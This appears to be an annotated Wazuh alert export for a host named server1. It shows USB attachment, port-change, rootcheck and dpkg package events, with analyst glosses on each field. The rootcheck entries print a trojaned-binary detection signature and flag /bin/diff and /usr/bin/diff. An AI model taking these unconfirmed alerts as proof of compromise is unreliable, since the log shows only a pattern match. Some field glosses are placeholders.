rule.description: Attached USB Storage Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 81101 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['usb'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gpg13: ['4.8'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533320.0 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:21:59.791313+00:00 server1 kernel: usb 2-2.1: New USB device found, idVendor=0e0f, idProduct=0008, bcdDevice= 1.00 The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: kernel Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:21:59.791313+00:00 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
decoder.parent: kernel Parent decoder used – for nested parsing.
decoder.name: kernel Name of the Wazuh decoder that parsed this raw log.
data.id: usb No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/kern.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Attached USB Storage Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 81101 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['usb'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gpg13: ['4.8'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533320.266 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:21:59.791313+00:00 server1 kernel: usb 2-2.1: New USB device found, idVendor=0e0f, idProduct=0008, bcdDevice= 1.00 The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: kernel Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:21:59.791313+00:00 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
decoder.parent: kernel Parent decoder used – for nested parsing.
decoder.name: kernel Name of the Wazuh decoder that parsed this raw log.
data.id: usb No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/syslog Which log source produced the event (e.g., sysmon, auditd).
rule.description: Listened ports status (netstat) changed (new port opened or closed). Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 533 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['ossec'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.2.7', '10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['10.1'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.14', 'AU.6'] NIST 800‑53 mapping – US Fed controls.
rule.description: Host-based anomaly detection event (rootcheck). Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 510 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['ossec', 'rootcheck'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533323.14629 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: Trojaned version of file '/bin/diff' detected. Signature used: 'bash|^/bin/sh|file\.h|proc\.h|/dev/[^n]|^/bin/.*sh' (Generic). The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: rootcheck Name of the Wazuh decoder that parsed this raw log.
data.title: Trojaned version of file detected. Short title some decoders add – usually informational.
data.file: /bin/diff Generic file path referenced in the log.
location: rootcheck Which log source produced the event (e.g., sysmon, auditd).
rule.description: Host-based anomaly detection event (rootcheck). Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 510 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['ossec', 'rootcheck'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533323.15004 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: Trojaned version of file '/usr/bin/diff' detected. Signature used: 'bash|^/bin/sh|file\.h|proc\.h|/dev/[^n]|^/bin/.*sh' (Generic). The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: rootcheck Name of the Wazuh decoder that parsed this raw log.
data.title: Trojaned version of file detected. Short title some decoders add – usually informational.
data.file: /usr/bin/diff Generic file path referenced in the log.
location: rootcheck Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533374.15387 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:22:53 status half-configured linux-libc-dev:amd64 6.8.0-57.59 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-libc-dev Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-57.59 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533374.15874 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:22:54 status half-configured linux-tools-common:all 6.8.0-57.59 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-tools-common Package name involved (apt/yum). Good for vuln tracking.
data.arch: all System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-57.59 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533376.16365 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:22:54 status half-configured linux-libc-dev:amd64 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-libc-dev Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-58.60 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533376.16852 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:22:54 status installed linux-libc-dev:amd64 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status installed Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-libc-dev Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-58.60 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533376.17325 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:22:54 status installed linux-tools-common:all 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status installed Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-tools-common Package name involved (apt/yum). Good for vuln tracking.
data.arch: all System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-58.60 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533376.17802 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:22:54 status half-configured linux-tools-common:all 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-tools-common Package name involved (apt/yum). Good for vuln tracking.
data.arch: all System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 6.8.0-58.60 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533376.18293 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:22:54 status half-configured man-db:amd64 2.12.0-4build2 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: man-db Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 2.12.0-4build2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533376.18770 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:22:56 status installed man-db:amd64 2.12.0-4build2 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status installed Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: man-db Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 2.12.0-4build2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533382.19233 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:00 status half-configured libarchive13t64:amd64 3.7.2-2ubuntu0.3 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: libarchive13t64 Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 3.7.2-2ubuntu0.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533382.19732 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:01 status half-configured libarchive13t64:amd64 3.7.2-2ubuntu0.4 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: libarchive13t64 Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 3.7.2-2ubuntu0.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533382.20231 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:01 status installed libarchive13t64:amd64 3.7.2-2ubuntu0.4 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status installed Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: libarchive13t64 Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 3.7.2-2ubuntu0.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Dpkg (Debian Package) half configured. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2904 Numeric ID of the detection rule that fired.
rule.firedtimes: 8 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg', 'config_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1', '10.2.7'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6', 'AU.14'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533382.20716 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:01 status half-configured libc-bin:amd64 2.39-0ubuntu8.4 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status half-configured Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: libc-bin Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 2.39-0ubuntu8.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533382.21199 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:01 status installed libc-bin:amd64 2.39-0ubuntu8.4 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: status installed Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: libc-bin Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: 2.39-0ubuntu8.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: New dpkg (Debian Package) requested to install. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2901 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533386.22728 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:06 install linux-modules-6.8.0-58-generic:amd64 6.8.0-58.60 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: install Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-modules-6.8.0-58-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: New dpkg (Debian Package) requested to install. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2901 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533388.23170 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24 22:23:06 install linux-image-6.8.0-58-generic:amd64 6.8.0-58.60+1 The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.name: dpkg-decoder Name of the Wazuh decoder that parsed this raw log.
data.dpkg_status: install Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.
data.package: linux-image-6.8.0-58-generic Package name involved (apt/yum). Good for vuln tracking.
data.arch: amd64 System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.
data.version: No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/dpkg.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: New dpkg (Debian Package) requested to install. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 2901 Numeric ID of the detection rule that fired.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['syslog', 'dpkg'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gpg13: ['4.10'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
